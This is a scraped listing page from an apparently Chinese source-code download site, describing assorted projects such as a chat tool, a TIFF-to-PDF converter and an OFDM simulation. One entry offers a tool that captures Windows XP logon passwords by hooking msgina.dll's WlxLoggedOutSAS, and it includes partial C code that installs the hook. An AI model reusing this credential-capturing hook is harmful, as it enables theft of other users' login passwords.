-
CGI development kits for disaggregated data and variables. Zip
CGI开发包,用于分解数据和各个变量 .zip-CGI development kits for disaggregated data and variables. Zip
- 2022-12-01 12:35:03下载
- 积分:1
-
java实现套接字通信
用java语言实现套接字通信,实现客户端与服务器的通信,可以聊天通信,是一个小型的聊天工具。
- 2022-01-25 20:47:31下载
- 积分:1
-
竟然出现带源码的版本,怪哉
竟然出现带源码的版本,怪哉-has emerged source version, Firefox
- 2023-08-15 01:05:05下载
- 积分:1
-
大量可供参考的C 语言源程序库
大量可供参考的C 语言源程序库-plenty of reference for C language source
- 2022-03-19 23:55:50下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
vista平台下sidebar上实现一个显示天气的gadget。将代码拷入[SystemInstalledDriver:]users[user name]app...
vista平台下sidebar上实现一个显示天气的gadget。将代码拷入[SystemInstalledDriver:]users[user name]appdatalocalmicrosoftwindows sidebargadgets目录即可
- 2022-01-29 04:05:15下载
- 积分:1
-
OFDM simulation on the procedures for beginners OFDM simulation should be helpfu...
关于OFDM仿真的程序,对初学OFDM仿真的朋友应该很有帮助.-OFDM simulation on the procedures for beginners OFDM simulation should be helpful friend.
- 2022-03-22 08:45:04下载
- 积分:1
-
TS流系统层解析程序,功能齐全。VC编译通过。
TS流系统层解析程序,功能齐全。VC编译通过。-TS streaming system layer analytical procedures, a full-featured. Through the VC compiler.
- 2022-08-10 22:11:12下载
- 积分:1
-
是一个传真TIFF文件格式转换成PDF格式。里面的原始代码没有美国..
是一个把TIFF传真的文件格式转化成PDF格式。里面的原代码没有使用任何第三方控件,是个很不错的小工具,但要主要环境的配置。-Is a fax to TIFF file format into PDF format. Inside the original code did not use any third-party controls, is a very good gadget, but the main environmental configuration.
- 2022-03-18 16:31:07下载
- 积分:1
-
eight digital vc the original document, with a manual only to the design of the...
八数码问题的vc原文件,用人工只能的a算法来设计的,请大家执教-eight digital vc the original document, with a manual only to the design of the algorithm, please coach
- 2022-03-23 18:56:31下载
- 积分:1